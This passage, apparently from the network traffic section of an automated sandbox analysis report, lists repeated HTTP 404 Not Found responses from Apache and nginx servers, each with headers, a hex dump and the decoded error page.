20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Dec 2024 17:59:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Dec 2024 17:59:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Dec 2024 17:59:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Dec 2024 17:59:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 17:59:58 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 18:00:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 